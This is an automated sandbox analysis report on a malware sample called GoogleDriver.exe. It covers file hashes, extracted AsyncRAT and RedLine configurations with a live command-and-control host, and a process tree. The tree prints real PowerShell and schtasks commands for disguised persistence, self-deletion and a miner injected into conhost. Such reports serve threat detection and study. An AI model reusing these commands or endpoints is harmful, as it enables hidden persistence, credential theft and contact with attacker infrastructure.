Analysis
-
max time kernel
355s -
max time network
359s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2022 04:47
Behavioral task
behavioral1
Sample
GoogleDriver.exe
Resource
win7-20220812-en
General
-
Target
GoogleDriver.exe
-
Size
63KB
-
MD5
dae21c538a7a4f8294d7e19916be9100
-
SHA1
cea1c44030c6f45243a9408e59f8e43304402438
-
SHA256
3184a8183ddd00795ae4da31244c3bdf010ab97addc4df2b66129982c9ede4e4
-
SHA512
8e9dd2b4e4ec9b28cb7c40e41f6ba8607e1c16351398d5de84965ee0a596fe255b8bfafb61eee99c83281d7cb43b029695ce68db3b7c942acfe392d63f7d4e26
-
SSDEEP
1536:6hQDnx1Ak32YGbHZCyYaN1bbLwtY3L3VG/tpqKmY7:6hQDnx1Ak32HHZCyP1bbLxL322z
Malware Config
Extracted
asyncrat
1.0.7 - modded by last
New
nicehash.at:4343
adsasutex_qwqdanchun
-
delay
1
-
install
true
-
install_file
GoogleDriver.exe
-
install_folder
%AppData%
Extracted
redline
cheat
nicehash.at:1338
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\rdln.exe family_redline C:\Users\Admin\AppData\Local\Temp\rdln.exe family_redline behavioral2/memory/3096-156-0x0000000000DD0000-0x0000000000DEE000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
Processes:
mina.exeupdater.execonhost.exedescription pid process target process PID 4984 created 2824 4984 mina.exe Explorer.EXE PID 4984 created 2824 4984 mina.exe Explorer.EXE PID 4984 created 2824 4984 mina.exe Explorer.EXE PID 4832 created 2824 4832 updater.exe Explorer.EXE PID 4832 created 2824 4832 updater.exe Explorer.EXE PID 4832 created 2824 4832 updater.exe Explorer.EXE PID 3956 created 2824 3956 conhost.exe Explorer.EXE PID 4832 created 2824 4832 updater.exe Explorer.EXE -
Async RAT payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3812-132-0x000002BD37110000-0x000002BD37126000-memory.dmp asyncrat C:\Users\Admin\AppData\Roaming\GoogleDriver.exe asyncrat C:\Users\Admin\AppData\Roaming\GoogleDriver.exe asyncrat -
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3872-191-0x00007FF7DADE0000-0x00007FF7DB5D4000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
GoogleDriver.exerdln.exemina.exeupdater.exepid process 2476 GoogleDriver.exe 3096 rdln.exe 4984 mina.exe 4832 updater.exe -
Processes:
resource yara_rule behavioral2/memory/3872-191-0x00007FF7DADE0000-0x00007FF7DB5D4000-memory.dmp upx -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
GoogleDriver.exeGoogleDriver.exerdln.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation GoogleDriver.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation GoogleDriver.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation rdln.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 4832 set thread context of 3956 4832 updater.exe conhost.exe PID 4832 set thread context of 3872 4832 updater.exe conhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4084 timeout.exe -
Suspicious behavior: EnumeratesProcesses 50 IoCs
Processes:
GoogleDriver.exepowershell.exeGoogleDriver.exerdln.exemina.exepowershell.exepowershell.exeupdater.exepowershell.execonhost.exepid process 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 3812 GoogleDriver.exe 740 powershell.exe 740 powershell.exe 2476 GoogleDriver.exe 3096 rdln.exe 3096 rdln.exe 4984 mina.exe 4984 mina.exe 1976 powershell.exe 1976 powershell.exe 4984 mina.exe 4984 mina.exe 4984 mina.exe 4984 mina.exe 956 powershell.exe 956 powershell.exe 4832 updater.exe 4832 updater.exe 4560 powershell.exe 4560 powershell.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 3956 conhost.exe 3956 conhost.exe 4832 updater.exe 4832 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 668 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
GoogleDriver.exeGoogleDriver.exepowershell.exerdln.exepowershell.exedescription pid process Token: SeDebugPrivilege 3812 GoogleDriver.exe Token: SeDebugPrivilege 2476 GoogleDriver.exe Token: SeDebugPrivilege 740 powershell.exe Token: SeDebugPrivilege 3096 rdln.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeIncreaseQuotaPrivilege 1976 powershell.exe Token: SeSecurityPrivilege 1976 powershell.exe Token: SeTakeOwnershipPrivilege 1976 powershell.exe Token: SeLoadDriverPrivilege 1976 powershell.exe Token: SeSystemProfilePrivilege 1976 powershell.exe Token: SeSystemtimePrivilege 1976 powershell.exe Token: SeProfSingleProcessPrivilege 1976 powershell.exe Token: SeIncBasePriorityPrivilege 1976 powershell.exe Token: SeCreatePagefilePrivilege 1976 powershell.exe Token: SeBackupPrivilege 1976 powershell.exe Token: SeRestorePrivilege 1976 powershell.exe Token: SeShutdownPrivilege 1976 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeSystemEnvironmentPrivilege 1976 powershell.exe Token: SeRemoteShutdownPrivilege 1976 powershell.exe Token: SeUndockPrivilege 1976 powershell.exe Token: SeManageVolumePrivilege 1976 powershell.exe Token: 33 1976 powershell.exe Token: 34 1976 powershell.exe Token: 35 1976 powershell.exe Token: 36 1976 powershell.exe Token: SeIncreaseQuotaPrivilege 1976 powershell.exe Token: SeSecurityPrivilege 1976 powershell.exe Token: SeTakeOwnershipPrivilege 1976 powershell.exe Token: SeLoadDriverPrivilege 1976 powershell.exe Token: SeSystemProfilePrivilege 1976 powershell.exe Token: SeSystemtimePrivilege 1976 powershell.exe Token: SeProfSingleProcessPrivilege 1976 powershell.exe Token: SeIncBasePriorityPrivilege 1976 powershell.exe Token: SeCreatePagefilePrivilege 1976 powershell.exe Token: SeBackupPrivilege 1976 powershell.exe Token: SeRestorePrivilege 1976 powershell.exe Token: SeShutdownPrivilege 1976 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeSystemEnvironmentPrivilege 1976 powershell.exe Token: SeRemoteShutdownPrivilege 1976 powershell.exe Token: SeUndockPrivilege 1976 powershell.exe Token: SeManageVolumePrivilege 1976 powershell.exe Token: 33 1976 powershell.exe Token: 34 1976 powershell.exe Token: 35 1976 powershell.exe Token: 36 1976 powershell.exe Token: SeIncreaseQuotaPrivilege 1976 powershell.exe Token: SeSecurityPrivilege 1976 powershell.exe Token: SeTakeOwnershipPrivilege 1976 powershell.exe Token: SeLoadDriverPrivilege 1976 powershell.exe Token: SeSystemProfilePrivilege 1976 powershell.exe Token: SeSystemtimePrivilege 1976 powershell.exe Token: SeProfSingleProcessPrivilege 1976 powershell.exe Token: SeIncBasePriorityPrivilege 1976 powershell.exe Token: SeCreatePagefilePrivilege 1976 powershell.exe Token: SeBackupPrivilege 1976 powershell.exe Token: SeRestorePrivilege 1976 powershell.exe Token: SeShutdownPrivilege 1976 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeSystemEnvironmentPrivilege 1976 powershell.exe Token: SeRemoteShutdownPrivilege 1976 powershell.exe Token: SeUndockPrivilege 1976 powershell.exe Token: SeManageVolumePrivilege 1976 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
conhost.exepid process 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
conhost.exepid process 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe 3872 conhost.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
GoogleDriver.execmd.execmd.exeGoogleDriver.execmd.exepowershell.exerdln.execmd.exepowershell.exeupdater.execmd.exedescription pid process target process PID 3812 wrote to memory of 4560 3812 GoogleDriver.exe cmd.exe PID 3812 wrote to memory of 4560 3812 GoogleDriver.exe cmd.exe PID 3812 wrote to memory of 4948 3812 GoogleDriver.exe cmd.exe PID 3812 wrote to memory of 4948 3812 GoogleDriver.exe cmd.exe PID 4560 wrote to memory of 4820 4560 cmd.exe schtasks.exe PID 4560 wrote to memory of 4820 4560 cmd.exe schtasks.exe PID 4948 wrote to memory of 4084 4948 cmd.exe timeout.exe PID 4948 wrote to memory of 4084 4948 cmd.exe timeout.exe PID 4948 wrote to memory of 2476 4948 cmd.exe GoogleDriver.exe PID 4948 wrote to memory of 2476 4948 cmd.exe GoogleDriver.exe PID 2476 wrote to memory of 216 2476 GoogleDriver.exe cmd.exe PID 2476 wrote to memory of 216 2476 GoogleDriver.exe cmd.exe PID 216 wrote to memory of 740 216 cmd.exe powershell.exe PID 216 wrote to memory of 740 216 cmd.exe powershell.exe PID 740 wrote to memory of 3096 740 powershell.exe rdln.exe PID 740 wrote to memory of 3096 740 powershell.exe rdln.exe PID 740 wrote to memory of 3096 740 powershell.exe rdln.exe PID 3096 wrote to memory of 4984 3096 rdln.exe mina.exe PID 3096 wrote to memory of 4984 3096 rdln.exe mina.exe PID 1652 wrote to memory of 1624 1652 cmd.exe choice.exe PID 1652 wrote to memory of 1624 1652 cmd.exe choice.exe PID 956 wrote to memory of 1068 956 powershell.exe schtasks.exe PID 956 wrote to memory of 1068 956 powershell.exe schtasks.exe PID 4832 wrote to memory of 3956 4832 updater.exe conhost.exe PID 4492 wrote to memory of 2464 4492 cmd.exe WMIC.exe PID 4492 wrote to memory of 2464 4492 cmd.exe WMIC.exe PID 4832 wrote to memory of 3872 4832 updater.exe conhost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2824
-
C:\Users\Admin\AppData\Local\Temp\GoogleDriver.exe"C:\Users\Admin\AppData\Local\Temp\GoogleDriver.exe"2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6A14.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:4084
-
-
C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rdln.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rdln.exe"'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Users\Admin\AppData\Local\Temp\rdln.exe"C:\Users\Admin\AppData\Local\Temp\rdln.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Users\Admin\AppData\Local\Temp\mina.exe"C:\Users\Admin\AppData\Local\Temp\mina.exe"8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4984
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleDriver" /tr '"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "GoogleDriver" /tr '"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"'4⤵
- Creates scheduled task(s)
PID:4820
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbmct#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#pabzpsih#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1068
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\mina.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1624
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbmct#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4560
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe edycnlwzugcaw2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:3956
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵PID:3704
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:2464
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe uuhuzuzzdeatgvvd 6E3sjfZq2rJQaxvLPmXgsFbIFjbxmk9QBL7MU6NBupSQ/yPb49Ni8CWmHiG+BmFOZlQDiFNUDfkmEWc2woFGLRtqlxZaMJqfYVCHASAmDi4WqDx2BN1SWbf1FzX3l0BO5odAt9xZ8ywS1nNJVreZJQbhXAWcCXGR2lY/kjxaiE1MX2s7iWnTBwp8KIXfg7HDcPuznp1Elm0jyGorgknzRusTYuproFIGUWn2iFRCj4FEecMuZozROLfx1UuYPLnyjZ2ngHwcFq84HGbPGEsn6L0hkAW1RXnmqvrhxROpX915Fh05CVAxtNj7E4dJWh4xLltr7YWVBP/WuI8oBeZcMdU2HfidYrEtMA+iYLM7jO+2iEMvS8aT18wo0pp/zDaySbsDkF1Sp9QAEiymHjwAbQ==2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3872
-
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4832
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD57ff9440dc25523a288d278b38add13a1
SHA1d67faf5afe85cacd9d816349f17ded3686ecf1a7
SHA256ac518124d3bd39440bfba66739f8fab57ff82ea778f707ea2c902b29efde0ee0
SHA5127116fcf6760a69efebfbffeba5abcfef903cc8647e142117023e022bb34c5fe6d1a35c727faab1e6d6505b2bd69689cf52f8ecef5253ca12d99d425021799911
-
Filesize
1KB
MD54ee95b2cc6050ec464890e249f411da7
SHA1c23b3ba1e2e9438e67037cd93cd05e69fdcb23e3
SHA2561842cfc5151d4f9821e1df20f1c64a44f1f478bb0932723cd605a031e11c5b01
SHA51222806a64855bd867e2593486f6f4b08e93d4900f55fd73ed6b4df0349ea5ab2b3e0c9872e9bc1d9a4438ad083cab7ea49af37b0bfe650a7b2b962de2c52c3ec4
-
Filesize
1KB
MD58688d60597fefe2171f1eec397d4e370
SHA10420388a2c6ea976c6b75ebcba2b30998107290f
SHA25662c8234faa12fd93b9b29b4a104c2b690061b65702c29e68ad655316f63fd48e
SHA512a2311eefdae2d7f85b868ede642d4de5aee3127c6c5f52cbfb453b1f77b784b06a5d4dc3bc1bfe573c68c7767e7201c1e6916e097aaefbcad9431ad8fc7783be
-
Filesize
3.5MB
MD5bd3bd541461eb9e8b3510441ee459746
SHA12ea26afe0901163b0eb7b9c84f46866f3ffd91f7
SHA256505a09c5be91d9e44a7b459ac5e8961fe01a234c1633a789ba290e94e81fa5f5
SHA51222abd36091dd6f2542a2d8ae77d34a176d757b7bb90bbe1b0515b08883f33438b5eb6e6753a1e2cef5c5d8e7b9a8e869c2756369029f666c88c92736520be6aa
-
Filesize
3.5MB
MD5bd3bd541461eb9e8b3510441ee459746
SHA12ea26afe0901163b0eb7b9c84f46866f3ffd91f7
SHA256505a09c5be91d9e44a7b459ac5e8961fe01a234c1633a789ba290e94e81fa5f5
SHA51222abd36091dd6f2542a2d8ae77d34a176d757b7bb90bbe1b0515b08883f33438b5eb6e6753a1e2cef5c5d8e7b9a8e869c2756369029f666c88c92736520be6aa
-
Filesize
95KB
MD56aefd743bed0887a18bbbd3b0c533dfb
SHA1bb8140a7efc7a1dec295fa4894b0efa7203c6b49
SHA256001170049bf107796ad564d572ef540743e0a66805f61a51a980998f7c09f5d1
SHA51270cc520173a922443d4ec81f487227a4d6a5e2c3f7d3cee1c0a6ecc94cf8ceee64e53d75e6f6a5f51d0ae050939d78b9cad9d72bf5a3872c72a2ad7a69842929
-
Filesize
95KB
MD56aefd743bed0887a18bbbd3b0c533dfb
SHA1bb8140a7efc7a1dec295fa4894b0efa7203c6b49
SHA256001170049bf107796ad564d572ef540743e0a66805f61a51a980998f7c09f5d1
SHA51270cc520173a922443d4ec81f487227a4d6a5e2c3f7d3cee1c0a6ecc94cf8ceee64e53d75e6f6a5f51d0ae050939d78b9cad9d72bf5a3872c72a2ad7a69842929
-
Filesize
156B
MD531770c143014dfa0bb3aac42eaa71cdf
SHA1d53a13618756a81bc1c38cd7d87f04c35c6a1a09
SHA2563f1389cc813f5018341d265d9b12c34ac2a6f4736aa96dd3f16cfb069a6f196f
SHA512d0ea4f41582d9d96b937b76e28c5580fcb5bdef6fc79827675e35954013cde35a62390d9a2901093a8db752bc5d407fdce2e7ded1f35a7211fe8a401b31c133b
-
Filesize
63KB
MD5dae21c538a7a4f8294d7e19916be9100
SHA1cea1c44030c6f45243a9408e59f8e43304402438
SHA2563184a8183ddd00795ae4da31244c3bdf010ab97addc4df2b66129982c9ede4e4
SHA5128e9dd2b4e4ec9b28cb7c40e41f6ba8607e1c16351398d5de84965ee0a596fe255b8bfafb61eee99c83281d7cb43b029695ce68db3b7c942acfe392d63f7d4e26
-
Filesize
63KB
MD5dae21c538a7a4f8294d7e19916be9100
SHA1cea1c44030c6f45243a9408e59f8e43304402438
SHA2563184a8183ddd00795ae4da31244c3bdf010ab97addc4df2b66129982c9ede4e4
SHA5128e9dd2b4e4ec9b28cb7c40e41f6ba8607e1c16351398d5de84965ee0a596fe255b8bfafb61eee99c83281d7cb43b029695ce68db3b7c942acfe392d63f7d4e26
-
Filesize
3.5MB
MD5bd3bd541461eb9e8b3510441ee459746
SHA12ea26afe0901163b0eb7b9c84f46866f3ffd91f7
SHA256505a09c5be91d9e44a7b459ac5e8961fe01a234c1633a789ba290e94e81fa5f5
SHA51222abd36091dd6f2542a2d8ae77d34a176d757b7bb90bbe1b0515b08883f33438b5eb6e6753a1e2cef5c5d8e7b9a8e869c2756369029f666c88c92736520be6aa
-
Filesize
3.5MB
MD5bd3bd541461eb9e8b3510441ee459746
SHA12ea26afe0901163b0eb7b9c84f46866f3ffd91f7
SHA256505a09c5be91d9e44a7b459ac5e8961fe01a234c1633a789ba290e94e81fa5f5
SHA51222abd36091dd6f2542a2d8ae77d34a176d757b7bb90bbe1b0515b08883f33438b5eb6e6753a1e2cef5c5d8e7b9a8e869c2756369029f666c88c92736520be6aa
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29